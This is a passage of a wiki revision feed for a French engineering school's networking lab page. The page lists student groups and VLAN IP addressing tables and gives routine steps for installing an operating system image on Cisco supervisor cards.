|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 3&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 4&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 5&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 6&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 7&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 8&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 9&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Interconnexion&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|Router1 : X  // Router2 : X // Ecole : X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== IP des VMs ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de la VM !! IP de la VM&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Cartes de supervision ===&lt;br /&gt;
&lt;br /&gt;
Problèmatique: Configuration et installation des OS des cartes de supervision&lt;br /&gt;
&lt;br /&gt;
Etape 1: Vérifier l'existance d'OS sur les deux cartes. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes. &lt;br /&gt;
 -&amp;gt; 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)&lt;br /&gt;
 -&amp;gt; 2ème carte: OS absent &lt;br /&gt;
&lt;br /&gt;
Etape 2: Copie du fichier d'OS&lt;br /&gt;
&lt;br /&gt;
[[Fichier:TP sysres IMA2a5 2020/2021 - Carte Supervision 1.jpg]]&lt;br /&gt;
&lt;br /&gt;
Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la premiere carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxieme carte de supervision.&lt;br /&gt;
&lt;br /&gt;
copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&amp;amp;éé-33.SXI6.bin disk0:&lt;br /&gt;
&lt;br /&gt;
Etape 3: Reboot de la deuxième carte&lt;br /&gt;
&lt;br /&gt;
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur. &lt;br /&gt;
&lt;br /&gt;
boot&lt;br /&gt;
sh ver &lt;br /&gt;
&lt;br /&gt;
Etape 4: Vérificaton de la redondance&lt;br /&gt;
&lt;br /&gt;
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=52460</id>
		<title>TP sysres IMA2a5 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=52460"/>
				<updated>2020-09-25T08:39:57Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* Table d'adressage IP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Bienvenue sur l'article wikipédia de la promotion 2020 - 2021 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.&lt;br /&gt;
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| SAWICZ Lionel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| HERBOMEL Guillaume&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| CRAMETTE Samuel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| AVEZ Thibaut&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| GLAINE Alexandre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| VITTECOQ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| CHENU Léna &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| COULON Nathan&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| DJAMBA Crispin&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Architecture matérielle ==&lt;br /&gt;
[[Fichier:Architecture-MA2a5-2020_2021.JPG]]&lt;br /&gt;
&lt;br /&gt;
== Table d'adressage IP ==&lt;br /&gt;
&lt;br /&gt;
=== Table du vlan1 ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|10.60.0.1&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|10.60.0.2&lt;br /&gt;
|-&lt;br /&gt;
|mask&lt;br /&gt;
|255.255.255.0&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table du vlan2 ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP  !! nom Vm&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|193.48.57.61&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|193.48.57.62&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|routeur virtuel&lt;br /&gt;
|193.48.57.63&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Lionel&lt;br /&gt;
|193.48.57.64&lt;br /&gt;
|Rafale&lt;br /&gt;
|-&lt;br /&gt;
|Guillaume&lt;br /&gt;
|193.48.57.65&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Samuel&lt;br /&gt;
|193.48.57.66&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Thibaut&lt;br /&gt;
|193.48.57.67&lt;br /&gt;
|Falcon&lt;br /&gt;
|-&lt;br /&gt;
|Alexandre&lt;br /&gt;
|193.48.57.68&lt;br /&gt;
|Mirage&lt;br /&gt;
|-&lt;br /&gt;
|Thomas&lt;br /&gt;
|193.48.57.69&lt;br /&gt;
|Alpha_jet&lt;br /&gt;
|-&lt;br /&gt;
|Crispin&lt;br /&gt;
|193.48.57.70&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Léna&lt;br /&gt;
|193.48.57.71&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Nathan&lt;br /&gt;
|193.48.57.72&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|ISR&lt;br /&gt;
|193.48.57.73&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Mask&lt;br /&gt;
|255.255.255.240&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table du vlan130 ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|192.168.222.2&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|1192.168.222.1&lt;br /&gt;
|-&lt;br /&gt;
|mask&lt;br /&gt;
|255.255.255.248&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table générale ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Vlan !! Réseau IPV4 !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel&lt;br /&gt;
|-&lt;br /&gt;
|Xen&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 1&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 2&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 3&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 4&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 5&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 6&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 7&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 8&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 9&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Interconnexion&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|Router1 : X  // Router2 : X // Ecole : X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== IP des VMs ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de la VM !! IP de la VM&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Cartes de supervision ===&lt;br /&gt;
&lt;br /&gt;
Problèmatique: Configuration et installation des OS des cartes de supervision&lt;br /&gt;
&lt;br /&gt;
Etape 1: Vérifier l'existance d'OS sur les deux cartes. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes. &lt;br /&gt;
 -&amp;gt; 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)&lt;br /&gt;
 -&amp;gt; 2ème carte: OS absent &lt;br /&gt;
&lt;br /&gt;
Etape 2: Copie du fichier d'OS&lt;br /&gt;
&lt;br /&gt;
[[Fichier:TP sysres IMA2a5 2020/2021 - Carte Supervision 1.jpg]]&lt;br /&gt;
&lt;br /&gt;
Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la premiere carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxieme carte de supervision.&lt;br /&gt;
&lt;br /&gt;
copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&amp;amp;éé-33.SXI6.bin disk0:&lt;br /&gt;
&lt;br /&gt;
Etape 3: Reboot de la deuxième carte&lt;br /&gt;
&lt;br /&gt;
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur. &lt;br /&gt;
&lt;br /&gt;
boot&lt;br /&gt;
sh ver &lt;br /&gt;
&lt;br /&gt;
Etape 4: Vérificaton de la redondance&lt;br /&gt;
&lt;br /&gt;
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=52459</id>
		<title>TP sysres IMA2a5 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=52459"/>
				<updated>2020-09-25T08:39:39Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* Table d'adressage IP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Bienvenue sur l'article wikipédia de la promotion 2020 - 2021 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.&lt;br /&gt;
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| SAWICZ Lionel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| HERBOMEL Guillaume&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| CRAMETTE Samuel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| AVEZ Thibaut&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| GLAINE Alexandre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| VITTECOQ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| CHENU Léna &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| COULON Nathan&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| DJAMBA Crispin&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Architecture matérielle ==&lt;br /&gt;
[[Fichier:Architecture-MA2a5-2020_2021.JPG]]&lt;br /&gt;
&lt;br /&gt;
== Table d'adressage IP ==&lt;br /&gt;
&lt;br /&gt;
=== Table du vlan1 ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|10.60.0.1&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|10.60.0.2&lt;br /&gt;
|-&lt;br /&gt;
|mask&lt;br /&gt;
|255.255.255.0&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table du vlan2 ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP  !! nom Vm&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|193.48.57.61&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|193.48.57.62&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|routeur virtuel&lt;br /&gt;
|193.48.57.63&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Lionel&lt;br /&gt;
|193.48.57.64&lt;br /&gt;
|Rafale&lt;br /&gt;
|-&lt;br /&gt;
|Guillaume&lt;br /&gt;
|193.48.57.65&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Samuel&lt;br /&gt;
|193.48.57.66&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Thibaut&lt;br /&gt;
|193.48.57.67&lt;br /&gt;
|Falcon&lt;br /&gt;
|-&lt;br /&gt;
|Alexandre&lt;br /&gt;
|193.48.57.68&lt;br /&gt;
|Mirage&lt;br /&gt;
|-&lt;br /&gt;
|Thomas&lt;br /&gt;
|193.48.57.69&lt;br /&gt;
|Alpha_jet&lt;br /&gt;
|-&lt;br /&gt;
|Crispin&lt;br /&gt;
|193.48.57.70&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Léna&lt;br /&gt;
|193.48.57.71&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Nathan&lt;br /&gt;
|193.48.57.72&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|ISR&lt;br /&gt;
|193.48.57.73&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Mask&lt;br /&gt;
|255.255.255.240&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|192.168.222.2&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|1192.168.222.1&lt;br /&gt;
|-&lt;br /&gt;
|mask&lt;br /&gt;
|255.255.255.248&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table générale ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Vlan !! Réseau IPV4 !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel&lt;br /&gt;
|-&lt;br /&gt;
|Xen&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 1&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 2&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 3&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 4&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 5&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 6&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 7&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 8&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 9&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Interconnexion&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|Router1 : X  // Router2 : X // Ecole : X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== IP des VMs ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de la VM !! IP de la VM&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Cartes de supervision ===&lt;br /&gt;
&lt;br /&gt;
Problèmatique: Configuration et installation des OS des cartes de supervision&lt;br /&gt;
&lt;br /&gt;
Etape 1: Vérifier l'existance d'OS sur les deux cartes. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes. &lt;br /&gt;
 -&amp;gt; 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)&lt;br /&gt;
 -&amp;gt; 2ème carte: OS absent &lt;br /&gt;
&lt;br /&gt;
Etape 2: Copie du fichier d'OS&lt;br /&gt;
&lt;br /&gt;
[[Fichier:TP sysres IMA2a5 2020/2021 - Carte Supervision 1.jpg]]&lt;br /&gt;
&lt;br /&gt;
Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la premiere carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxieme carte de supervision.&lt;br /&gt;
&lt;br /&gt;
copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&amp;amp;éé-33.SXI6.bin disk0:&lt;br /&gt;
&lt;br /&gt;
Etape 3: Reboot de la deuxième carte&lt;br /&gt;
&lt;br /&gt;
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur. &lt;br /&gt;
&lt;br /&gt;
boot&lt;br /&gt;
sh ver &lt;br /&gt;
&lt;br /&gt;
Etape 4: Vérificaton de la redondance&lt;br /&gt;
&lt;br /&gt;
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=52455</id>
		<title>TP sysres IMA2a5 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=52455"/>
				<updated>2020-09-25T08:35:39Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* Table du vlan2 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Bienvenue sur l'article wikipédia de la promotion 2020 - 2021 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.&lt;br /&gt;
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| SAWICZ Lionel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| HERBOMEL Guillaume&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| CRAMETTE Samuel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| AVEZ Thibaut&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| GLAINE Alexandre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
